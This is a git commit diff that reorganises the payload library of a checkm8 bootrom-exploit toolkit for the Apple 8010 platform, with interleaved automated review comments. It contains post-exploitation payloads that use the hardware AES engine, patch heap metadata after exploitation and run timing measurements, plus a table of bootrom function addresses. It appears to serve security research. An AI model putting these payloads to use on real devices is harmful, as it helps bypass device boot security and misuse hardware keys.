heavily restructured libpayload, more integrated with c8_remote now

2020-02-11 09:56:37 -05:00
parent 983ad0ad29
commit bd4c9b8196
28 changed files with 317 additions and 332 deletions


@@ -2,8 +2,8 @@ cmake_minimum_required(VERSION 3.10)
project(checkm8_tool) project(checkm8_tool)
enable_language(C) enable_language(C)
include_directories(c8_remote/include)
include_directories(include) include_directories(include)
#add_subdirectory(c8_arduino) add_subdirectory(c8_remote/lib)
add_subdirectory(c8_remote) add_subdirectory(c8_remote)
add_subdirectory(c8_libpayload)


@@ -1,24 +0,0 @@
#ifndef CHECKM8_TOOL_BRFUNC_AES_H
#define CHECKM8_TOOL_BRFUNC_AES_H
#include "brfunc_common.h"
int aes_hw_crypto_cmd(unsigned long long cmd,
unsigned char *src, unsigned char *dst,
int len, unsigned long long opts,
unsigned char *key, unsigned char *iv)
{
return ((BOOTROM_FUNC) ADDR_AES_HW_CRYPTO_CMD)(cmd, src, dst, len, opts, key, iv);
}
#define CREATE_KEY_COMMAND ((BOOTROM_FUNC) ADDR_CREATE_KEY_COMMAND)
#define PUSH_COMMAND_KEY ((BOOTROM_FUNC) ADDR_PUSH_COMMAND_KEY)
#define PUSH_COMMAND_IV ((BOOTROM_FUNC) ADDR_PUSH_COMMAND_IV)
#define PUSH_COMMAND_DATA ((BOOTROM_FUNC) ADDR_PUSH_COMMAND_DATA)
#define PUSH_COMMAND_FLAG ((BOOTROM_FUNC) ADDR_PUSH_COMMAND_FLAG)
#define WAIT_FOR_COMMAND_FLAG ((BOOTROM_FUNC) ADDR_WAIT_FOR_COMMAND)
#define rAES_INT_STATUS (long *) ADDR_AES_CONTROL
#define rAES_CONTROL (long *) ADDR_AES_STATUS
#endif //CHECKM8_TOOL_BRFUNC_AES_H


@@ -1,40 +0,0 @@
#ifndef CHECKM8_TOOL_BRFUNC_COMMON_H
#define CHECKM8_TOOL_BRFUNC_COMMON_H
#include "checkm8_config.h"
typedef int (*BOOTROM_FUNC)();
typedef unsigned char (*(*BOOTROM_FUNC_PTR)());
#if CHECKM8_PLATFORM == 8010
/* AES */
#define ADDR_AES_HW_CRYPTO_CMD 0x100000f0c
#define ADDR_CREATE_KEY_COMMAND 0x100000e90
#define ADDR_PUSH_COMMAND_KEY 0x100000c64
#define ADDR_PUSH_COMMAND_IV 0x100000d18
#define ADDR_PUSH_COMMAND_DATA 0x100000d98
#define ADDR_PUSH_COMMAND_FLAG 0x100000e20
#define ADDR_WAIT_FOR_COMMAND 0x100000ec4
#define ADDR_AES_CONTROL 0x20A108008
#define ADDR_AES_STATUS 0x20A108018
/* SEP */
#define ADDR_DPA_SEEDED 0x100001140
#define ADDR_SEND_DPA_MESSAGE 0x100002338
/* Timing */
#define ADDR_CLOCK_GATE 0x100009d4c
#define ADDR_SYSTEM_TIME 0x10000B0E0
#define ADDR_TIME_HAS_ELAPSED 0x10000B04F
#define ADDR_TASK_SLEEP 0x10000ADF0
/* Boot */
#define ADDR_NVME_INIT 0x1000080B4
#else
#error "Unsupported checkm8 platform"
#endif
#endif //CHECKM8_TOOL_BRFUNC_COMMON_H


@@ -1,9 +0,0 @@
#ifndef CHECKM8_TOOL_BRFUNC_SEP_H
#define CHECKM8_TOOL_BRFUNC_SEP_H
#include "brfunc_common.h"
#define DPA_SEEDED ((BOOTROM_FUNC) ADDR_DPA_SEEDED)
#define SEP_CREATE_SEND_DPA_MESSAGE ((BOOTROM_FUNC) ADDR_SEND_DPA_MESSAGE)
#endif //CHECKM8_TOOL_BRFUNC_SEP_H


@@ -1,12 +0,0 @@
#ifndef CHECKM8_TOOL_BRFUNC_TIMING_H
#define CHECKM8_TOOL_BRFUNC_TIMING_H
#include "brfunc_common.h"
#define CLOCK_GATE ((BOOTROM_FUNC) ADDR_CLOCK_GATE)
#define SYSTEM_TIME ((BOOTROM_FUNC) ADDR_SYSTEM_TIME)
#define TIME_HAS_ELAPSED ((BOOTROM_FUNC) ADDR_TIME_HAS_ELAPSED)
#define GET_PLL ((BOOTROM_FUNC) ADDR_GET_PLL)
#endif //CHECKM8_TOOL_BRFUNC_TIMING_H


@@ -1,7 +0,0 @@
#ifndef CHECKM8_TOOL_UTIL_H
#define CHECKM8_TOOL_UTIL_H
#define PAYLOAD_SECTION __attribute__ ((section (".payload_text")))
#define TEXT_SECTION __attribute__((section (".text")))
#endif //CHECKM8_TOOL_UTIL_H


@@ -1,60 +0,0 @@
#include "brfunc_aes.h"
#include "brfunc_timing.h"
#include "brfunc_sep.h"
#include "util.h"
PAYLOAD_SECTION
int aes_hw_crypto_command(unsigned int cmd,
void *src,
void *dst,
int len,
unsigned int opts,
void *key,
void *iv)
{
int seeded;
long cgvar;
long start = 0, timeout = 0;
__asm__("orr %0, xzr, #0x3c" : "=r" (cgvar));
CLOCK_GATE(cgvar, 0);
// seeded = DPA_SEEDED();
// if(!(seeded & 1))
// {
// SEP_CREATE_SEND_DPA_MESSAGE();
// start = SYSTEM_TIME();
//
// while(!(seeded & 1) && !(timeout & 1))
// {
// seeded = DPA_SEEDED();
// timeout = TIME_HAS_ELAPSED(start, 1000);
// }
// }
//
// if(timeout) return -1;
unsigned int key_command = CREATE_KEY_COMMAND(0, 0, 0, 0, 1, 0, 0, 0);
*rAES_INT_STATUS = 0x20;
*rAES_CONTROL = 1;
PUSH_COMMAND_KEY(key_command, key);
PUSH_COMMAND_IV(0, 0, 0, iv);
PUSH_COMMAND_DATA(0, 0, src, dst, len);
PUSH_COMMAND_FLAG(0, 1, 1);
WAIT_FOR_COMMAND_FLAG();
*rAES_CONTROL = 2;
CLOCK_GATE(cgvar, 0);
return 0;
}
TEXT_SECTION
int _start(void *src,
void *dst,
void *key)
{
return ((BOOTROM_FUNC) ADDR_AES_HW_CRYPTO_CMD)(0, src, dst, 128, 0, key, 0);
// return aes_hw_crypto_command(0, src, dst, 128, 0, key, 0);
}


@@ -1,62 +0,0 @@
#include "brfunc_common.h"
#include "util.h"
PAYLOAD_SECTION
void fix_heap()
{
BOOTROM_FUNC calculate_checksum = ((BOOTROM_FUNC) 0x10000ee20);
BOOTROM_FUNC heap_verify = ((BOOTROM_FUNC) 0x10000f8b4);
*((unsigned long long *) 0x1801b91a0) = 0x80 / 0x40;
*((unsigned long long *) 0x1801b91a8) = ((0x840u / 0x40) << 2u);
*((unsigned long long *) 0x1801b91b0) = 0x80;
*((unsigned long long *) 0x1801b91b8) = 0;
*((unsigned long long *) 0x1801b9220) = 0x80 / 0x40;
*((unsigned long long *) 0x1801b9228) = ((0x80u / 0x40) << 2u);
*((unsigned long long *) 0x1801b9230) = 0x80;
*((unsigned long long *) 0x1801b9238) = 0;
*((unsigned long long *) 0x1801b92a0) = 0x80 / 0x40;
*((unsigned long long *) 0x1801b92a8) = ((0x80u / 0x40) << 2u);
*((unsigned long long *) 0x1801b92b0) = 0x80;
*((unsigned long long *) 0x1801b92b8) = 0;
__asm__ volatile ("dmb sy");
calculate_checksum((unsigned long long *) 0x1801b9180,
(unsigned long long *) 0x1801b91a0,
32,
(unsigned long long *) 0x180080640);
calculate_checksum((unsigned long long *) 0x1801b9200,
(unsigned long long *) 0x1801b9220,
32,
(unsigned long long *) 0x180080640);
calculate_checksum((unsigned long long *) 0x1801b9280,
(unsigned long long *) 0x1801b92a0,
32,
(unsigned long long *) 0x180080640);
__asm__ volatile ("dmb sy");
heap_verify();
}
TEXT_SECTION
void _start(unsigned long long ptr_self)
{
unsigned int *completion = (unsigned int *) 0x180088ac8;
unsigned char *dfu_done = (unsigned char *) 0x180088ac0;
unsigned long long *dfu_event = (unsigned long long *) 0x180088af0;
BOOTROM_FUNC event_signal = ((BOOTROM_FUNC) 0x10000aee8);
BOOTROM_FUNC free = ((BOOTROM_FUNC) 0x10000f1b0);
fix_heap();
*completion = -1;
*dfu_done = 1;
event_signal(dfu_event);
free(ptr_self);
}


@@ -1,17 +0,0 @@
#include "util.h"
struct sysregs
{
long pt_base;
long evt_base;
};
TEXT_SECTION
long long _start()
{
struct sysregs res;
__asm__("mrs %0, ttbr0_el1" : "=r" (res.pt_base));
__asm__("mrs %0, vbar_el1" : "=r" (res.evt_base));
return res.pt_base;
}


@@ -1,21 +0,0 @@
#include "util.h"
#include "brfunc_common.h"
TEXT_SECTION
void _start(unsigned long long next,
unsigned long long arg0, unsigned long long arg1,
unsigned long long arg2, unsigned long long arg3)
{
int i;
BOOTROM_FUNC clock_gate = ((BOOTROM_FUNC) 0x100009d4cull);
for(i = 0x54 + 6; i > 6; i--)
{
if(i == 0x4b || i == 0x4a || i == 0x49 || i == 0x3e ||
i == 0x1b || i == 0x17 || i == 0x11 || i == 0x10)
continue;
clock_gate(i, 0);
}
((BOOTROM_FUNC) next)(arg0, arg1, arg2, arg3);
}


@@ -0,0 +1,48 @@
#ifndef CHECKM8_TOOL_BOOTROM_ADDR_H
#define CHECKM8_TOOL_BOOTROM_ADDR_H
#include "checkm8_config.h"
#if CHECKM8_PLATFORM == 8010
/* Crypto */
#define ADDR_HARDWARE_AES 0x100000f0c
/* Timing */
#define ADDR_CLOCK_GATE 0x100009d4c
#define ADDR_GET_TIME 0x10000b0e0
#define ADDR_TIMER_REGISTER_INT 0x10000b874
#define ADDR_WFI 0x1000004fc
/* Tasking */
#define ADDR_TASK_NEW 0x10000a9ac
#define ADDR_TASK_RUN 0x10000ac18
#define ADDR_TASK_PAUSE 0x10000adf0
#define ADDR_TASK_RESCHED 0x10000aaa8
#define ADDR_TASK_FREE 0x10000aa20
#define ADDR_EVENT_NEW 0x10000aed4
#define ADDR_EVENT_NOTIFY 0x10000aee8
#define ADDR_EVENT_WAIT 0x10000af3c
/* Heap */
#define ADDR_CALC_CHKSUM 0x10000ee20
#define ADDR_CHECK_BLOCK_CKSUM 0x10000f138
#define ADDR_CHECK_ALL_CHKSUMS 0x10000f8b4
#define ADDR_DEV_MALLOC 0x10000efe0
#define ADDR_DEV_MEMALIGN 0x10000f380
#define ADDR_DEV_FREE 0x10000f1b0
/* Misc */
#define ADDR_RANDOM_RET 0x10000b924
#define ADDR_DFU_RETVAL (int *) 0x180088ac8
#define ADDR_DFU_STATUS (unsigned char *) 0x180088ac0
#define ADDR_DFU_EVENT (unsigned long long *) 0x180088af0
#else
#error "Unsupported checkm8 platform"
#endif
#endif //CHECKM8_TOOL_BOOTROM_ADDR_H
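Review bot: The three DFU macros at the end of the 8010 block (`ADDR_DFU_RETVAL`, `ADDR_DFU_STATUS`, `ADDR_DFU_EVENT`) expand to a bare cast with no outer parentheses, so they are only safe where the use site wraps them, as `*(ADDR_DFU_RETVAL)` does elsewhere in this commit. Writing them as `#define ADDR_DFU_RETVAL ((int *) 0x180088ac8)`, and likewise for the other two, removes that dependency. They are also the only entries in the header that are typed pointers rather than integer addresses, which deserves a one-line comment so callers do not cast them a second time. `ADDR_RANDOM_RET` sits under "Misc" with no explanation of what it points at; a short comment there would help the next reader.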


@@ -5,14 +5,11 @@
typedef enum typedef enum
{ {
PAYLOAD_AES,
PAYLOAD_AES_BUSY, PAYLOAD_AES_BUSY,
PAYLOAD_AES_SW, PAYLOAD_AES_SW,
PAYLOAD_EXIT_USB_TASK, PAYLOAD_EXIT_USB_TASK,
PAYLOAD_FLOPPYSLEEP, PAYLOAD_FLOPPYSLEEP,
PAYLOAD_SYNC, PAYLOAD_SYNC,
PAYLOAD_SYSREG,
PAYLOAD_TASK_SLEEP_TEST
} PAYLOAD_T; } PAYLOAD_T;
typedef enum typedef enum


@@ -1,35 +1,32 @@
project(checkm8_libpayload) project(checkm8_libpayload)
set(PL_NAMES set(PL_NAMES
aes
aes_busy aes_busy
aes_sw aes_sw
exit_usb_task exit_usb_task
floppysleep floppysleep
sync sync)
sysreg
task_sleep_test)
foreach(NAME ${PL_NAMES}) foreach(NAME ${PL_NAMES})
list(APPEND PL_TARGETS "payload_${NAME}") list(APPEND PL_TARGETS "payload_${NAME}")
list(APPEND PL_SRC_BIN "${CMAKE_CURRENT_LIST_DIR}/pl/src/${NAME}.c") list(APPEND PL_SRC_BIN "${CMAKE_CURRENT_LIST_DIR}/payload/src/${NAME}.c")
endforeach(NAME) endforeach(NAME)
foreach(TARGET ${PL_TARGETS}) foreach(TARGET ${PL_TARGETS})
list(APPEND PL_SRC_LIB "${CMAKE_CURRENT_BINARY_DIR}/lib/${TARGET}.c") list(APPEND PL_SRC_LIB "${CMAKE_CURRENT_BINARY_DIR}/lib_cfiles/${TARGET}.c")
list(APPEND PL_BIN "${CMAKE_CURRENT_BINARY_DIR}/pl/bin/${TARGET}.bin") list(APPEND PL_BIN "${CMAKE_CURRENT_BINARY_DIR}/payload/bin/${TARGET}.bin")
endforeach(TARGET) endforeach(TARGET)
add_subdirectory(pl) add_subdirectory(${CMAKE_CURRENT_LIST_DIR}/payload)
file(MAKE_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/lib) file(MAKE_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/lib_cfiles)
add_custom_target(payload_sources add_custom_target(payload_sources
BYPRODUCTS ${PL_SRC_LIB} BYPRODUCTS ${PL_SRC_LIB}
DEPENDS ${PL_TARGETS} DEPENDS ${PL_TARGETS}
COMMENT "Refreshing payload library" COMMENT "Refreshing payload library"
COMMAND python3 ${CMAKE_CURRENT_LIST_DIR}/scripts/librarize.py COMMAND python3 ${CMAKE_CURRENT_LIST_DIR}/scripts/librarize.py
${CMAKE_CURRENT_BINARY_DIR}/pl/bin ${CMAKE_CURRENT_BINARY_DIR}/payload/bin
${CMAKE_CURRENT_BINARY_DIR}/lib) ${CMAKE_CURRENT_BINARY_DIR}/lib_cfiles)
add_library(payload ${PL_SRC_LIB}) add_library(payload ${PL_SRC_LIB})
add_dependencies(payload payload_sources) add_dependencies(payload payload_sources)


@@ -1,6 +1,6 @@
project(checkm8_libpayload_sources C ASM) project(checkm8_libpayload_sources C ASM)
include_directories(include) include_directories(${CMAKE_CURRENT_LIST_DIR}/include)
include_directories(include/openssl)
set(CMAKE_SYSTEM_PROCESSOR arm) set(CMAKE_SYSTEM_PROCESSOR arm)
if(${CMAKE_HOST_SYSTEM_PROCESSOR} STREQUAL "x86_64") if(${CMAKE_HOST_SYSTEM_PROCESSOR} STREQUAL "x86_64")
@@ -15,9 +15,11 @@ elseif(${CMAKE_HOST_SYSTEM_PROCESSOR} STREQUAL "armv7l")
set(CMAKE_OBJCOPY /opt/cross/bin/aarch64-linux-objcopy) set(CMAKE_OBJCOPY /opt/cross/bin/aarch64-linux-objcopy)
endif() endif()
set(CMAKE_C_FLAGS "-nostdlib -O") set(CMAKE_C_FLAGS "-nostdlib -O -Wl,--gc-sections")
file(MAKE_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/bin) file(MAKE_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/bin)
add_library(bootrom_dev bootrom_dev.c)
foreach(NAME ${PL_NAMES}) foreach(NAME ${PL_NAMES})
if(EXISTS ${CMAKE_CURRENT_LIST_DIR}/src/${NAME}.S) if(EXISTS ${CMAKE_CURRENT_LIST_DIR}/src/${NAME}.S)
add_executable(payload_${NAME} ${CMAKE_CURRENT_LIST_DIR}/src/${NAME}.c add_executable(payload_${NAME} ${CMAKE_CURRENT_LIST_DIR}/src/${NAME}.c
@@ -25,10 +27,12 @@ foreach(NAME ${PL_NAMES})
else() else()
add_executable(payload_${NAME} ${CMAKE_CURRENT_LIST_DIR}/src/${NAME}.c) add_executable(payload_${NAME} ${CMAKE_CURRENT_LIST_DIR}/src/${NAME}.c)
endif() endif()
target_link_libraries(payload_${NAME} bootrom_dev)
add_custom_command(TARGET payload_${NAME} POST_BUILD add_custom_command(TARGET payload_${NAME} POST_BUILD
BYPRODUCTS ${CMAKE_CURRENT_BINARY_DIR}/bin/payload_${NAME}.bin BYPRODUCTS ${CMAKE_CURRENT_BINARY_DIR}/bin/payload_${NAME}.bin
COMMAND ${CMAKE_OBJCOPY} COMMAND ${CMAKE_OBJCOPY}
ARGS -O binary -j .text -j .payload_text -j .payload_data ARGS -O binary -j .text -j .payload_text -j .bootrom_lib.*
${CMAKE_CURRENT_BINARY_DIR}/payload_${NAME} ${CMAKE_CURRENT_BINARY_DIR}/payload_${NAME}
${CMAKE_CURRENT_BINARY_DIR}/bin/payload_${NAME}.bin) ${CMAKE_CURRENT_BINARY_DIR}/bin/payload_${NAME}.bin)
endforeach(NAME) endforeach(NAME)
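Review bot: The objcopy argument list in the last hunk no longer copies `.payload_data`, and nothing in the build fails if a payload source still places objects in that section; the bytes would simply be missing from the generated `.bin`. If the section is retired on purpose, a comment next to the `ARGS` line saying so would prevent a silent regression later. The new `-j .bootrom_lib.*` argument contains a glob character and the `add_custom_command` has no `VERBATIM`, so how it reaches objcopy depends on the generator's shell handling; adding `VERBATIM` makes that deterministic.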


@@ -0,0 +1,123 @@
#include "bootrom_addr.h"
#include "dev_util.h"
/* Crypto */
BRLIB_SECTION("crypto")
int hardware_aes(unsigned long long cmd,
unsigned char *src, unsigned char *dst,
int len, unsigned long long opts,
unsigned char *key, unsigned char *iv)
{
return ((BOOTROM_FUNC_I) ADDR_HARDWARE_AES)(cmd, src, dst, len, opts, key, iv);
}
/* Timing */
BRLIB_SECTION("timing.power")
int clock_gate(int device, int power)
{
return ((BOOTROM_FUNC_I) ADDR_CLOCK_GATE)(device, power);
}
BRLIB_SECTION("timing.time")
unsigned long long get_time()
{
return ((BOOTROM_FUNC_ULL) ADDR_GET_TIME)();
}
BRLIB_SECTION("timing.sleep")
void timer_register_int(unsigned long long dl)
{
((BOOTROM_FUNC_V) ADDR_TIMER_REGISTER_INT)(dl, ADDR_RANDOM_RET);
}
BRLIB_SECTION("timing.sleep")
void wfi()
{
((BOOTROM_FUNC_V) ADDR_WFI)();
}
/* Tasking */
BRLIB_SECTION("tasking.task")
void *task_new(char *name, BOOTROM_FUNC_I func, void *args, int ssize)
{
return ((BOOTROM_FUNC_PTR) ADDR_TASK_NEW)(name, func, args, ssize);
}
void task_run(void *task)
{
((BOOTROM_FUNC_V) ADDR_TASK_RUN)(task);
}
BRLIB_SECTION("tasking.task")
void task_pause(int usec)
{
((BOOTROM_FUNC_V) ADDR_TASK_PAUSE)(usec);
}
BRLIB_SECTION("tasking.task")
void task_resched()
{
((BOOTROM_FUNC_V) ADDR_TASK_RESCHED)();
}
BRLIB_SECTION("tasking.task")
void task_free(void *task)
{
((BOOTROM_FUNC_V) ADDR_TASK_FREE)(task);
}
BRLIB_SECTION("tasking.event")
void event_new(void *dst, int flags, int state)
{
((BOOTROM_FUNC_V) ADDR_EVENT_NEW)(dst, flags, state);
}
BRLIB_SECTION("tasking.event")
void event_notify(void *ev)
{
((BOOTROM_FUNC_V) ADDR_EVENT_NOTIFY)(ev);
}
BRLIB_SECTION("tasking.event")
void event_wait(void *ev)
{
((BOOTROM_FUNC_V) ADDR_EVENT_WAIT)(ev);
}
/* Heap */
BRLIB_SECTION("heap.mgmt")
void calc_chksum(unsigned long long *dst, unsigned long long *src,
int len, unsigned long long *cookie)
{
((BOOTROM_FUNC_V) ADDR_CALC_CHKSUM)(dst, src, len, cookie);
}
BRLIB_SECTION("heap.mgmt")
void check_block_chksum(void *ptr)
{
((BOOTROM_FUNC_V) ADDR_CHECK_BLOCK_CKSUM)(ptr);
}
BRLIB_SECTION("heap.mgmt")
void check_all_chksums()
{
((BOOTROM_FUNC_V) ADDR_CHECK_ALL_CHKSUMS)();
}
BRLIB_SECTION("heap.alloc")
void *dev_malloc(int size)
{
return ((BOOTROM_FUNC_PTR) ADDR_DEV_MALLOC)(size);
}
BRLIB_SECTION("heap.alloc")
void *dev_memalign(int size, int constr)
{
return ((BOOTROM_FUNC_PTR) ADDR_DEV_MEMALIGN)(size, constr);
}
BRLIB_SECTION("heap.alloc")
void dev_free(void *ptr)
{
((BOOTROM_FUNC_PTR) ADDR_DEV_FREE)(ptr);
}
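Review bot: `task_run` is the only wrapper in this file without a `BRLIB_SECTION(...)` attribute, so it is emitted into the default `.text` instead of a `.bootrom_lib.*` section like its siblings; add `BRLIB_SECTION("tasking.task")` above it. `dev_free` is declared `void` but calls through `BOOTROM_FUNC_PTR`, the pointer-returning typedef; `((BOOTROM_FUNC_V) ADDR_DEV_FREE)(ptr);` matches the declaration and the other void wrappers. `dev_malloc` and `dev_memalign` take their sizes as plain `int` and forward them unchecked, so a negative value goes straight to the ROM allocator; an unsigned size type would state the contract better.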


@@ -0,0 +1,38 @@
#ifndef CHECKM8_TOOL_BOOTROM_FUNC_H
#define CHECKM8_TOOL_BOOTROM_FUNC_H
#include "dev_util.h"
/* Crypto */
int hardware_aes(unsigned long long cmd,
unsigned char *src, unsigned char *dst,
int len, unsigned long long opts,
unsigned char *key, unsigned char *iv);
/* Timing */
int clock_gate(int device, int power);
unsigned long long get_time();
void timer_register_int(unsigned long long dl);
void wfi();
/* Tasking */
void *task_new(char *name, BOOTROM_FUNC_I func, void *args, int ssize);
void task_run(void *task);
void task_pause(int usec);
void task_resched();
void task_free(void *task);
void event_new(void *dst, int flags, int state);
void event_notify(void *ev);
void event_wait(void *ev);
/* Heap */
void calc_chksum(unsigned long long *dst, unsigned long long *src, int len, unsigned long long *cookie);
void check_block_chksum(void *ptr);
void check_all_chksums();
void *dev_malloc(int size);
void *dev_memalign(int size, int constr);
void dev_free(void *ptr);
#endif //CHECKM8_TOOL_BOOTROM_FUNC_H


@@ -0,0 +1,13 @@
#ifndef CHECKM8_TOOL_DEV_UTIL_H
#define CHECKM8_TOOL_DEV_UTIL_H
typedef void (*BOOTROM_FUNC_V)();
typedef int (*BOOTROM_FUNC_I)();
typedef unsigned long long (*BOOTROM_FUNC_ULL)();
typedef void (*(*BOOTROM_FUNC_PTR)());
#define PAYLOAD_SECTION __attribute__ ((section (".payload_text")))
#define TEXT_SECTION __attribute__ ((section (".text")))
#define BRLIB_SECTION(s) __attribute__ ((section (".bootrom_lib."s)))
#endif //CHECKM8_TOOL_DEV_UTIL_H
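Review bot: The four `BOOTROM_FUNC_*` typedefs declare function pointers with an empty parameter list, so the compiler checks neither the number nor the types of the arguments at any call made through them, and the arguments only receive the default promotions. Under C23 an empty list means `(void)`, at which point every call that passes arguments through these types stops compiling. Consider casting to a fully prototyped pointer type inside each wrapper, for example `((int (*)(int, int)) ADDR_CLOCK_GATE)(device, power)`, and keeping the generic typedefs only for callback parameters such as `task_new`'s `func`. `BRLIB_SECTION(s)` relies on string-literal concatenation, so a short comment that `s` must be a string literal would be useful.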


@@ -1,7 +1,4 @@
#include "util.h" #include "bootrom_func.h"
#include "brfunc_aes.h"
#include "brfunc_timing.h"
TEXT_SECTION TEXT_SECTION
int _start(void *src, void *dst, void *key, int rep) int _start(void *src, void *dst, void *key, int rep)
@@ -16,9 +13,9 @@ int _start(void *src, void *dst, void *key, int rep)
// task_sleep(100); // task_sleep(100);
for(i = 0; i < rep; i++) for(i = 0; i < rep; i++)
{ {
if(i % 2 == 0) aes_hw_crypto_cmd(16, src_data, dst, 16, 0, key, 0); if(i % 2 == 0) hardware_aes(16, src_data, dst, 16, 0, key, 0);
else aes_hw_crypto_cmd(16, dst, src_data, 16, 0, key, 0); else hardware_aes(16, dst, src_data, 16, 0, key, 0);
// task_sleep(15); // task_sleep(15);
} }
return 0; return 0;


@@ -1,11 +1,4 @@
#include "util.h" #include "bootrom_func.h"
#include "brfunc_timing.h"
PAYLOAD_SECTION
void task_sleep(unsigned int usec)
{
((BOOTROM_FUNC) ADDR_TASK_SLEEP)(usec);
}
PAYLOAD_SECTION PAYLOAD_SECTION
void sub_bytes(unsigned char block[16], unsigned char sbox[16][16]) void sub_bytes(unsigned char block[16], unsigned char sbox[16][16])
@@ -116,18 +109,6 @@ void expand_key(unsigned char key[16], unsigned char key_sched[176], int n,
} }
} }
PAYLOAD_SECTION
void busy_sleep(int usec)
{
unsigned long long halt = 0x1000004fc;
unsigned long long timer_deadline_enter = 0x10000b874;
unsigned long long now;
__asm__ volatile ("mrs %0, cntpct_el0" : "=r" (now));
((BOOTROM_FUNC) timer_deadline_enter)(now + 24 * usec, ((BOOTROM_FUNC) 0x10000b924));
((BOOTROM_FUNC) halt)();
}
PAYLOAD_SECTION PAYLOAD_SECTION
void aes128_encrypt_ecb(unsigned char *msg, unsigned int msg_len, unsigned char key[16], void aes128_encrypt_ecb(unsigned char *msg, unsigned int msg_len, unsigned char key[16],
unsigned char sbox[16][16], unsigned char rc_lookup[11], unsigned char sbox[16][16], unsigned char rc_lookup[11],
@@ -135,7 +116,6 @@ void aes128_encrypt_ecb(unsigned char *msg, unsigned int msg_len, unsigned char
{ {
unsigned char key_sched[176]; unsigned char key_sched[176];
expand_key(key, key_sched, 11, sbox, rc_lookup); expand_key(key, key_sched, 11, sbox, rc_lookup);
busy_sleep(10);
unsigned int num_blocks = msg_len / 16; unsigned int num_blocks = msg_len / 16;
unsigned char *block; unsigned char *block;
@@ -175,8 +155,8 @@ unsigned long long _start(unsigned char *msg, unsigned int msg_len, unsigned cha
if(2 * end - start - 64 > 0) if(2 * end - start - 64 > 0)
{ {
((BOOTROM_FUNC) timer_deadline_enter)(2 * end - start - 64, ((BOOTROM_FUNC) 0x10000b924)); timer_register_int(2 * end - start - 64);
((BOOTROM_FUNC) halt)(); wfi();
} }
return end - start; return end - start;


@@ -0,0 +1,52 @@
#include "bootrom_addr.h"
#include "bootrom_func.h"
PAYLOAD_SECTION
void fix_heap()
{
*((unsigned long long *) 0x1801b91a0) = 0x80 / 0x40;
*((unsigned long long *) 0x1801b91a8) = ((0x840u / 0x40) << 2u);
*((unsigned long long *) 0x1801b91b0) = 0x80;
*((unsigned long long *) 0x1801b91b8) = 0;
*((unsigned long long *) 0x1801b9220) = 0x80 / 0x40;
*((unsigned long long *) 0x1801b9228) = ((0x80u / 0x40) << 2u);
*((unsigned long long *) 0x1801b9230) = 0x80;
*((unsigned long long *) 0x1801b9238) = 0;
*((unsigned long long *) 0x1801b92a0) = 0x80 / 0x40;
*((unsigned long long *) 0x1801b92a8) = ((0x80u / 0x40) << 2u);
*((unsigned long long *) 0x1801b92b0) = 0x80;
*((unsigned long long *) 0x1801b92b8) = 0;
__asm__ volatile ("dmb sy");
calc_chksum((unsigned long long *) 0x1801b9180,
(unsigned long long *) 0x1801b91a0,
32,
(unsigned long long *) 0x180080640);
calc_chksum((unsigned long long *) 0x1801b9200,
(unsigned long long *) 0x1801b9220,
32,
(unsigned long long *) 0x180080640);
calc_chksum((unsigned long long *) 0x1801b9280,
(unsigned long long *) 0x1801b92a0,
32,
(unsigned long long *) 0x180080640);
__asm__ volatile ("dmb sy");
check_all_chksums();
}
TEXT_SECTION
void _start(unsigned long long *ptr_self)
{
fix_heap();
*(ADDR_DFU_RETVAL) = -1;
*(ADDR_DFU_STATUS) = 1;
event_notify(ADDR_DFU_EVENT);
dev_free(ptr_self);
}
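Review bot: `fix_heap` still writes through twelve literal addresses and passes the literal `0x180080640` as `calc_chksum`'s `cookie` argument, while this commit moves the other bootrom addresses into `bootrom_addr.h` under the `CHECKM8_PLATFORM == 8010` guard. Naming these values in that header would keep every platform-specific constant in one place and let an unsupported platform fail at the `#error` instead of compiling stale literals. The function also has no comment explaining what the three blocks are or why the first uses `0x840u` where the other two use `0x80u`; a short header comment stating the intended post-condition would make the code reviewable.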


@@ -1,5 +1,4 @@
#include "brfunc_common.h" #include "bootrom_func.h"
#include "util.h"
extern unsigned long long fs_routine(void); extern unsigned long long fs_routine(void);
@@ -24,10 +23,7 @@ unsigned long long _start(float *init_a)
{ {
int i; int i;
volatile int j = 0; volatile int j = 0;
unsigned long long start, end, report; unsigned long long start, end, report;
unsigned long long timer_deadline_enter = 0x10000b874;
unsigned long long halt = 0x1000004fc;
__asm__ volatile ("isb\n\rmrs %0, cntpct_el0" : "=r" (start)); __asm__ volatile ("isb\n\rmrs %0, cntpct_el0" : "=r" (start));
fs_load(init_a, 1); fs_load(init_a, 1);
@@ -36,8 +32,8 @@ unsigned long long _start(float *init_a)
if(2 * end - start - 64 > 0) if(2 * end - start - 64 > 0)
{ {
((BOOTROM_FUNC) timer_deadline_enter)(2 * end - start - 64, ((BOOTROM_FUNC) 0x10000b924)); timer_register_int(2 * end - start - 64);
((BOOTROM_FUNC) halt)(); wfi();
} }
__asm__ volatile ("isb\n\rmrs %0, cntpct_el0" : "=r" (report)); __asm__ volatile ("isb\n\rmrs %0, cntpct_el0" : "=r" (report));
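Review bot: The guard `if(2 * end - start - 64 > 0)` in front of the new `timer_register_int(...)` / `wfi()` pair is evaluated in `unsigned long long` (see the declaration of `start` and `end` in the second hunk), so it is true for every value except exactly zero and cannot detect the subtraction wrapping. If the check is meant to catch that case, compare before subtracting: `if(2 * end > start + 64)`. The same guard precedes the same two calls in the software-AES payload, in the hunk at `@@ -175,8 +155,8 @@`. `_start` begins and ends outside the visible hunks.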


@@ -1,4 +1,4 @@
#include "util.h" #include "dev_util.h"
TEXT_SECTION TEXT_SECTION
void _start() void _start()


@@ -7,6 +7,7 @@
#include "command.h" #include "command.h"
#include "usb_helpers.h" #include "usb_helpers.h"
#include "bootrom_addr.h"
#include "libpayload.h" #include "libpayload.h"
struct payload struct payload
@@ -28,11 +29,6 @@ struct payload *get_payload(PAYLOAD_T p)
switch(p) switch(p)
{ {
case PAYLOAD_AES:
pl = payload_aes;
len = PAYLOAD_AES_SZ;
break;
case PAYLOAD_AES_BUSY: case PAYLOAD_AES_BUSY:
pl = payload_aes_busy; pl = payload_aes_busy;
len = PAYLOAD_AES_BUSY_SZ; len = PAYLOAD_AES_BUSY_SZ;
@@ -58,16 +54,6 @@ struct payload *get_payload(PAYLOAD_T p)
len = PAYLOAD_SYNC_SZ; len = PAYLOAD_SYNC_SZ;
break; break;
case PAYLOAD_SYSREG:
pl = payload_sysreg;
len = PAYLOAD_SYSREG_SZ;
break;
